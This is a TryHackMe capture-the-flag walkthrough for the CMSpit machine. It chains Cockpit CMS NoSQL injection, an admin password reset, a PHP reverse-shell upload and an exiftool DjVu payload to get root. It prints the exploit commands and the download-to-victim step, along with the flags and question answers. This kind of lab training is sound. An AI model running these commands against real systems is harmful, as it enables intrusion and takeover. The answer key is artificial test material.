CMSpit — TryHackMe Walkthrough
Hey guys, I’m sn0x — a cybersecurity researcher, bug hunter, and security enthusiast. I hold multiple certifications, including CNSP, EWPTXv2, CEH v11–12, GRC, RHCSA, and Cisco Cyber Threat Management.I’ve been ranked #1 in India and #2 globally on TryHackMe, secured #134 on Hack The Box in 2021, and even won HTB Battlegrounds twice.
But hey, this isn’t a job interview, so let’s not make it sound like a LinkedIn flex. At the end of the day, I just love hacking stuff (legally!), learning cool exploits, and sharing my knowledge. So yeah, blah blah… let’s skip the formalities and get to the fun part!
CMSpit is a medium-difficulty machine(360points) on TryHackMe that focuses on web application security and privilege escalation using recent vulnerabilities(2020). This machine provides an opportunity to explore real-world attack vectors, particularly targeting content management system (CMS) vulnerabilities.
Objectives:
- Enumerate and identify vulnerabilities in the CMS
- Exploit user enumeration and password manipulation flaws
- Gain initial access to the system
- Escalate privileges to achieve full system compromise
In this walkthrough, I will demonstrate a structured approach to identifying and exploiting the vulnerabilities in CMSpit, ensuring a clear understanding of the exploitation process.
Let’s begin.
1. Information Gathering
As always, I begin with Nmap (Network Mapper) to enumerate open ports, running services, and potential vulnerabilities on the target machine. This initial scan helps in identifying the attack surface.
Nmap Scan Command:
nmap -T5 -vv -oN nmapresult.txt <Your_machine_ip>Breakdown of the Flags:
-T5→ Insane scan speed for faster results-vv→ Very verbose output for detailed insights-oN→ Saves the scan results in a normal text format10.10.71.8→ Target machine IP
The results of this scan will provide crucial information about the open ports and running services, forming the foundation for further exploitation.
Result:
From the Nmap scan results, I identified two open ports on the target machine:
- 22 → OpenSSH 7.2p2 (Secure Shell, likely used for remote access)
- 80 → Apache httpd 2.4.18 (Web server hosting the application)
Navigating to the web server on port 80, I was automatically redirected to a login portal. This suggests that authentication is required to access further functionalities of the CMS.
To proceed, I attempted various enumeration techniques to gather information about potential users, accessible directories, and possible vulnerabilities in the CMS.
Q1.What is the name of the Content Management System (CMS) installed on the server?
Ans : cockpit
Q2.What is the version of the Content Management System (CMS) installed on the server?
Ans: 0.11.1
Now that we have gathered information about the Content Management System (CMS), including its name and version, we can check for known vulnerabilities. One of the best resources for this is Exploit-DB, where publicly available exploits are stored.
Searching Exploits with SearchSploit
I also used SearchSploit, a command-line tool that allows us to search for known exploits directly from the terminal.
searchsploit cockpit 0.11.1
Both Exploit-DB and SearchSploit returned relevant exploits, confirming that this version of the CMS is vulnerable. Next, I proceeded to analyze the available exploits and determine the best approach for exploitation.
Exploiting the NoSQL Injection Vulnerability
During our research, we identified an exploit with a CVE number: CVE-2020–35846. This vulnerability leverages NoSQL injection in the /auth/check endpoint, allowing us to perform username enumeration and password resets.
Chaining Multiple CVEs for Exploitation
Q3. What is the path that allow user enumeration?
Ans : /auth/check
To automate this attack, we will use an exploit script found on Exploit-DB. This script combines CVE-2020–35846, CVE-2020–35847, and CVE-2020–35848, making it a powerful tool for exploiting the CMS.
Executing the Exploit Script
We can run the exploit using the following command:
python3 50185.py -u http://<Your_Machine_IP>The exploit successfully enumerated all users stored in the database. Now, to retrieve the email address associated with the “admin” account, we can simply rerun the exploit, specifying a different username:
Once we have the admin’s email, we can proceed with resetting their password using the same exploit. This will allow us to create new credentials for the admin user.
Q4.How many users can you identify when you reproduce the user enumeration attack?
Ans: 4
Q5.What is the path that allows you to change user account passwords?
Ans: /auth/resetpassword
Q6.Compromise the Content Management System (CMS). What is Skidy’s email?
Ans : skidy@tryhackme.fakemail
With the newly created admin credentials, we can now access the CMS login portal and gain control over the web server.
After successfully logging into the admin dashboard, I discovered an option to upload files to the web server. This presents a perfect opportunity to gain remote code execution by uploading a malicious PHP payload.
Choosing the Reverse Shell Payload
For this attack, I used the php-reverse-shell script from PentestMonkey, which is a well-known and reliable payload. You can download it directly from the PentestMonkey GitHub repository:https://github.com/pentestmonkey/php-reverse-shell
Modifying the Payload
Before uploading the payload, we need to modify two critical parameters:
- IP Address → Set this to your attack machine’s IP (your Kali/Parrot machine).
- Port → Set this to the port you want to receive the reverse shell connection on.
Edit the payload using a text editor like nano:
nano php-reverse-shell.phpUpdate the following lines:
php$ip = 'YOUR_IP_HERE'; // Change this to your attacker's IP
$port = 9001; // Change this to the listening port
Save th file and proceed to upload it via the admin dashboard.
Once the malicious PHP payload has been successfully uploaded, we need to execute it by navigating to the correct URL path in a web browser:
This triggers the payload, forcing the server to establish a connection back to our attack machine.
Setting Up a Listener
Before executing the payload, we need to start a Netcat listener on our attack machine to capture the incoming shell:
Upgrading Shell Using Python
Since Python is available on the target machine, we can spawn a TTY shell using the following command:
python3 -c "__import__('pty').spawn('/bin/bash')"
🔹 Now, our shell behaves more like a normal terminal, allowing us to execute commands more efficiently.
Next Step: Now that we have an upgraded shell, we will start privilege escalation to gain full control over the machine.
After gaining an interactive shell, the next step is to enumerate the system further to escalate our privileges. While exploring the home directory of the user “stux”, I found a database file named “.dbshell”, which could contain sensitive information.
Checking the .dbshell File
ls -la /home/stux
cat /home/stux/.dbshellIf the file contains stored credentials, we can use them to switch to the “stux” user.
Q8.Compromise the machine and enumerate collections in the document database installed in the server. What is the flag in the database?
Ans :thm{c3d1af8da23926a30b0c8f4d6ab71bf851754568}
su stuxSwitching to ‘stux’ Using Discovered Credentials
Now that we have valid credentials, we can log in as the “stux” user using
Once logged in, we have access to user-level privileges, bringing us one step closer to full system compromise
We have credentials for “stux” so let’s login into that user:
After enumerating stux’s privileges, we discovered that the user can execute exiftool as root using sudo. To confirm this, we run:
sudo -lThis reveals that “stux” can execute “exiftool” with root privileges.
Checking GTFOBins for Exploitation Methods
Since exiftool is a well-known utility for metadata manipulation in images, we check GTFOBins to see if it can be exploited for privilege escalation.
We find that exiftool has a known privilege escalation exploit that allows us to execute arbitrary commands as root.
Exploiting exiftool via djvumake for Root Privileges
From GTFOBins, we found that we can exploit exiftool by using djvumake, which allows us to execute arbitrary system commands as root.
Crafting a Malicious DJVU File
We create a malicious DjVu file that contains a payload to execute a shell as root:
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.bzzNow, let’s create the payload that will execute a shell:
echo "(metadata \"\c${system('/bin/bash -p')};\")" > payload.bzzTriggering the Exploit with exiftool
Once the malicious DjVu file is created, we execute exiftool on it with sudo to gain root access:
sudo exiftool exploit.djvuAlternative Method: Hosting & Transferring Payload
Instead of creating the payload directly on the victim machine, we can host and transfer it from our system.
Steps:
1️ Create the payload on your system:
echo '(metadata “\c${system(‘/bin/bash -p’)};”)' > payload.txt2️ Host it using Python HTTP server:
python3 -m http.server 90003️ Download it on the victim machine:
wget <Your_Host_IP>:9000/payload.txt4️ Create the malicious DjVu file:
djvumake exploit.djvu INFO='1,1' BGjp=/dev/null ANTz=payload.txt5️ Exploit using exiftool:
sudo exiftool exploit.djvuThis will execute our payload and spawn a root shell!
Root Access Achieved! 🎉
We have successfully escalated our privileges and are now root!
📂 Accessing the root directory & reading the flag:
cd /root
cat root.txtthm{bf52a85b12cf49b9b6d77643771d74e90d4d5ada}🔥 CMSpit machine pwned! 🚀
Q10.What is the CVE number for the vulnerability affecting the binary assigned to the system user? Answer format: CVE-0000–0000
Ans: CVE-2021–22204
Q11.What is the utility used to create the PoC file?
Ans: djvumake
Follow Me 🚀
If you enjoyed this blog and want to stay updated with my latest content, you can follow me here:
🔹 Twitter: @sn0x
🔹 Instagram: @sn0x
🔹 GitHub: sn0x-sharma
💙 Like this blog? Support my work!
If you found this useful and want to support me, you can do so here:
👉 Buy Me a Coffee
